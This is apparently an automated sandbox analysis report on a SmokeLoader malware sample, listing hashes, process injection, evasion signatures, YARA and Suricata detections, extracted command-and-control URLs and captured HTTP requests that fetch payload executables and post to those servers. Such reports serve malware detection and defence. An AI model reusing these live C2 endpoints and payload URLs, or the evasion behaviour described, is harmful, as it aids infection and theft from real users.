Edit tour

Windows Analysis Report
HaPJ2rPP6w.exe

Overview

General Information

Sample name:	HaPJ2rPP6w.exe renamed because original name is a hash value
Original sample name:	08e3912bd337bff072bd1346ddc39f3a.exe
Analysis ID:	1526113
MD5:	08e3912bd337bff072bd1346ddc39f3a
SHA1:	4968a92e8d90c576ea9bed482b5d36de2254e0e1
SHA256:	cae15eb4334c0d36ed9152d852766f970df9a0159895050742ca1036d54b0c37
Tags:	exeSocks5Systemzuser-abuse_ch
Infos:

Detection

SmokeLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Benign windows process drops PE files

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected SmokeLoader

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Checks if the current machine is a virtual machine (disk enumeration)

Creates a thread in another existing process (thread injection)

Deletes itself after installation

Hides that the sample has been downloaded from the Internet (zone.identifier)

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Switches to a custom stack to bypass stack traces

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Abnormal high CPU Usage

Checks if the current process is being debugged

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to launch a program with higher privileges

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Detected potential crypto function

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (may stop execution after checking a module file name)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains sections with non-standard names

Sigma detected: Execution of Suspicious File Type Extension

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses the system / local time for branch decision (may execute only at specific dates)

Yara signature match

Classification

Process Tree

System is w10x64

HaPJ2rPP6w.exe (PID: 7320 cmdline: "C:\Users\user\Desktop\HaPJ2rPP6w.exe" MD5: 08E3912BD337BFF072BD1346DDC39F3A)

explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)

C12E.exe (PID: 7924 cmdline: C:\Users\user\AppData\Local\Temp\C12E.exe MD5: 49A8BAC4600ABA0061CD216A4C75185C)

89ED.exe (PID: 7988 cmdline: C:\Users\user\AppData\Local\Temp\89ED.exe MD5: FBFC7A6D58571AF46628818A232931A5)

89ED.exe (PID: 8072 cmdline: "C:\Users\user\AppData\Local\Temp\89ED.exe" -sfxelevation MD5: FBFC7A6D58571AF46628818A232931A5)

wideaec (PID: 7736 cmdline: C:\Users\user\AppData\Roaming\wideaec MD5: 08E3912BD337BFF072BD1346DDC39F3A)

bbdeaec (PID: 4828 cmdline: C:\Users\user\AppData\Roaming\bbdeaec MD5: 49A8BAC4600ABA0061CD216A4C75185C)

bbdeaec (PID: 2364 cmdline: C:\Users\user\AppData\Roaming\bbdeaec MD5: 49A8BAC4600ABA0061CD216A4C75185C)

wideaec (PID: 1272 cmdline: C:\Users\user\AppData\Roaming\wideaec MD5: 08E3912BD337BFF072BD1346DDC39F3A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
SmokeLoader	The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.	SMOKY SPIDER	http://security.neurolabs.club/2019/08/smokeloaders-hardcoded-domains-sneaky.html http://security.neurolabs.club/2019/10/dynamic-imports-and-working-around.html http://security.neurolabs.club/2020/04/diffing-malware-samples-using-bindiff.html http://security.neurolabs.club/2020/06/unpacking-smokeloader-and.html https://0xc0decafe.com/2020/12/23/detect-rc4-in-malicious-binaries	https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

Malware Configuration

Threatname: SmokeLoader

{"Version": 2022, "C2 list": ["http://nwgrus.ru/tmp/index.php", "http://tech-servers.in.net/tmp/index.php", "http://unicea.ws/tmp/index.php"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000005.00000002.2053936482.0000000000630000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000006.00000002.2399579094.0000000002160000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000002.1783948879.000000000084E000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x34d5:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.1783799974.00000000006E1000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000000.00000002.1783799974.00000000006E1000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x214:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
0000000C.00000002.2756065052.00000000005A0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000002.1783719870.00000000006B0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
0000000C.00000003.2690701719.00000000005C0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000006.00000002.2399489660.000000000078D000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x36ca:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000006.00000003.2348513596.0000000002170000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000006.00000002.2399641073.0000000002191000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000006.00000002.2399641073.0000000002191000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x1e4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000000.00000002.1783748063.00000000006C0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000000.00000002.1783748063.00000000006C0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x614:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
0000000C.00000002.2757264209.00000000006AD000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x3892:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
0000000C.00000002.2756823088.0000000000631000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
0000000C.00000002.2756823088.0000000000631000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x1e4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000006.00000002.2399602012.0000000002170000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000006.00000002.2399602012.0000000002170000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x5e4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
0000000C.00000002.2756188540.00000000005C0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
0000000C.00000002.2756188540.00000000005C0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x5e4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000005.00000002.2054076985.000000000070D000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x38b5:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000005.00000002.2054000125.00000000006D0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000005.00000002.2054000125.00000000006D0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x614:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000005.00000002.2054109145.0000000002091000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000005.00000002.2054109145.0000000002091000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x214:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
Click to see the 21 entries

Unpacked PEs

Source	Rule	Description	Author
12.3.bbdeaec.5c0000.0.raw.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
6.2.C12E.exe.400000.0.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
6.2.C12E.exe.2160e67.1.raw.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
12.2.bbdeaec.5a0e67.1.raw.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
12.2.bbdeaec.400000.0.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
6.3.C12E.exe.2170000.0.raw.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
Click to see the 1 entries

Sigma Signatures

System Summary

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\wideaec, CommandLine: C:\Users\user\AppData\Roaming\wideaec, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\wideaec, NewProcessName: C:\Users\user\AppData\Roaming\wideaec, OriginalFileName: C:\Users\user\AppData\Roaming\wideaec, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\user\AppData\Roaming\wideaec, ProcessId: 7736, ProcessName: wideaec

Suricata Signatures

ET MALWARE Suspected Smokeloader Activity (POST)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-04T19:17:31.163380+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49736	177.129.90.106	80	TCP
2024-10-04T19:17:32.743839+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49737	177.129.90.106	80	TCP
2024-10-04T19:17:34.015007+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49738	177.129.90.106	80	TCP
2024-10-04T19:17:35.661779+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49739	177.129.90.106	80	TCP
2024-10-04T19:17:37.176772+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49740	177.129.90.106	80	TCP
2024-10-04T19:17:38.461103+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49741	177.129.90.106	80	TCP
2024-10-04T19:17:39.742990+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49742	177.129.90.106	80	TCP
2024-10-04T19:17:41.936055+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49743	177.129.90.106	80	TCP
2024-10-04T19:17:43.234932+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49744	177.129.90.106	80	TCP
2024-10-04T19:17:44.532366+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49745	177.129.90.106	80	TCP
2024-10-04T19:17:46.021153+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49746	177.129.90.106	80	TCP
2024-10-04T19:17:47.327483+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49747	177.129.90.106	80	TCP
2024-10-04T19:17:48.977509+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49748	177.129.90.106	80	TCP
2024-10-04T19:17:50.437179+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49749	177.129.90.106	80	TCP
2024-10-04T19:17:51.852257+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49750	177.129.90.106	80	TCP
2024-10-04T19:17:53.125210+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49751	177.129.90.106	80	TCP
2024-10-04T19:17:54.706817+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49752	177.129.90.106	80	TCP
2024-10-04T19:17:55.981022+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49753	177.129.90.106	80	TCP
2024-10-04T19:17:57.270101+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49754	177.129.90.106	80	TCP
2024-10-04T19:17:58.562666+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49756	177.129.90.106	80	TCP
2024-10-04T19:17:59.955931+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49758	177.129.90.106	80	TCP
2024-10-04T19:18:01.349075+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49764	177.129.90.106	80	TCP
2024-10-04T19:18:02.656822+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49771	177.129.90.106	80	TCP
2024-10-04T19:18:04.047722+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49781	177.129.90.106	80	TCP
2024-10-04T19:18:06.619406+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49798	177.129.90.106	80	TCP
2024-10-04T19:18:08.108094+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49804	177.129.90.106	80	TCP
2024-10-04T19:18:09.566598+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49815	177.129.90.106	80	TCP
2024-10-04T19:18:11.147908+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49819	177.129.90.106	80	TCP
2024-10-04T19:18:12.412956+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49826	177.129.90.106	80	TCP
2024-10-04T19:18:13.846347+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49833	177.129.90.106	80	TCP
2024-10-04T19:18:19.449251+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49864	177.129.90.106	80	TCP
2024-10-04T19:19:30.096822+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50035	177.129.90.106	80	TCP
2024-10-04T19:19:37.691008+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50036	177.129.90.106	80	TCP
2024-10-04T19:19:47.223334+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50037	177.129.90.106	80	TCP
2024-10-04T19:19:58.725636+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50038	177.129.90.106	80	TCP
2024-10-04T19:20:14.259793+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50039	180.75.11.133	80	TCP
2024-10-04T19:20:28.126238+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50040	180.75.11.133	80	TCP
2024-10-04T19:20:42.965243+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50041	180.75.11.133	80	TCP
2024-10-04T19:20:57.598842+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50042	180.75.11.133	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: HaPJ2rPP6w.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\bbdeaec	Avira: detection malicious, Label: HEUR/AGEN.1312571
Source: C:\Users\user\AppData\Roaming\wideaec	Avira: detection malicious, Label: HEUR/AGEN.1312571
Source: C:\Users\user\AppData\Local\Temp\C12E.exe	Avira: detection malicious, Label: HEUR/AGEN.1312571
Source: C:\Users\user\AppData\Local\Temp\89ED.exe	Avira: detection malicious, Label: HEUR/AGEN.1304598

Found malware configuration

Source: 00000000.00000002.1783748063.00000000006C0000.00000004.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://nwgrus.ru/tmp/index.php", "http://tech-servers.in.net/tmp/index.php", "http://unicea.ws/tmp/index.php"]}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\wideaec

ReversingLabs: Detection: 34%

Multi AV Scanner detection for submitted file

Source: HaPJ2rPP6w.exe

ReversingLabs: Detection: 34%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\bbdeaec	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\wideaec	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\C12E.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: HaPJ2rPP6w.exe

Joe Sandbox ML: detected

Source: HaPJ2rPP6w.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\HaPJ2rPP6w.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 23.145.40.164:443 -> 192.168.2.4:49792 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 217.197.91.145:443 -> 192.168.2.4:49843 version: TLS 1.2

Source: C:\Users\user\AppData\Local\Temp\89ED.exe	Code function: 7_2_00000001400040F4 GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime,		7_2_00000001400040F4
Source: C:\Users\user\AppData\Local\Temp\89ED.exe	Code function: 7_2_0000000140003A74 FindFirstFileW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPEAX@Z,??3@YAXPEAX@Z,		7_2_0000000140003A74

Source: C:\Users\user\AppData\Local\Temp\89ED.exe	Code function: 4x nop then movzx eax, byte ptr [rdx+07h]		7_2_0000000140013940
Source: C:\Users\user\AppData\Local\Temp\89ED.exe	Code function: 4x nop then movsxd r9, rbp		7_2_000000014000DDC0

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49743 -> 177.129.90.106:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49736 -> 177.129.90.106:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49740 -> 177.129.90.106:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49739 -> 177.129.90.106:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49747 -> 177.129.90.106:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49737 -> 177.129.90.106:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49746 -> 177.129.90.106:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49754 -> 177.129.90.106:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49752 -> 177.129.90.106:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49738 -> 177.129.90.106:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49804 -> 177.129.90.106:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49750 -> 177.129.90.106:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49819 -> 177.129.90.106:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49815 -> 177.129.90.106:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49748 -> 177.129.90.106:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49751 -> 177.129.90.106:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49749 -> 177.129.90.106:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49781 -> 177.129.90.106:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49741 -> 177.129.90.106:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49753 -> 177.129.90.106:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49756 -> 177.129.90.106:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49744 -> 177.129.90.106:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49764 -> 177.129.90.106:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49742 -> 177.129.90.106:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49745 -> 177.129.90.106:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49771 -> 177.129.90.106:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49758 -> 177.129.90.106:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49826 -> 177.129.90.106:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49864 -> 177.129.90.106:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49833 -> 177.129.90.106:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49798 -> 177.129.90.106:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50042 -> 180.75.11.133:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50040 -> 180.75.11.133:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50036 -> 177.129.90.106:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50039 -> 180.75.11.133:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50041 -> 180.75.11.133:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50035 -> 177.129.90.106:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50038 -> 177.129.90.106:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50037 -> 177.129.90.106:80

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 217.197.91.145 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 180.75.11.133 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 177.129.90.106 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 23.145.40.164 443	Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://nwgrus.ru/tmp/index.php
Source: Malware configuration extractor	URLs: http://tech-servers.in.net/tmp/index.php
Source: Malware configuration extractor	URLs: http://unicea.ws/tmp/index.php

Source: Joe Sandbox View	IP Address: 177.129.90.106 177.129.90.106
Source: Joe Sandbox View	IP Address: 23.145.40.164 23.145.40.164
Source: Joe Sandbox View	IP Address: 217.197.91.145 217.197.91.145

Source: Joe Sandbox View	ASN Name: WEBE-MY-AS-APWEBEDIGITALSDNBHDMY WEBE-MY-AS-APWEBEDIGITALSDNBHDMY
Source: Joe Sandbox View	ASN Name: Internet58Ltda-MEBR Internet58Ltda-MEBR
Source: Joe Sandbox View	ASN Name: SURFAIRWIRELESS-IN-01US SURFAIRWIRELESS-IN-01US
Source: Joe Sandbox View	ASN Name: IN-BERLIN-ASIndividualNetworkBerlineVDE IN-BERLIN-ASIndividualNetworkBerlineVDE

Source: Joe Sandbox View	JA3 fingerprint: 72a589da586844d7f0818ce684948eea
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: global traffic	HTTP traffic detected: GET /ksa9104.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 23.145.40.164
Source: global traffic	HTTP traffic detected: GET /alexcode11/templates/raw/branch/main/setup.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: codeberg.org
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ymfsjxxjefdfso.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 235Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://gaaiqehpdrl.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 197Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://nsyybqctivusmhf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 275Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://gyhesrqsslpwya.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 218Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://adcijuuyqpoytbg.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 131Host: nwgrus.ru
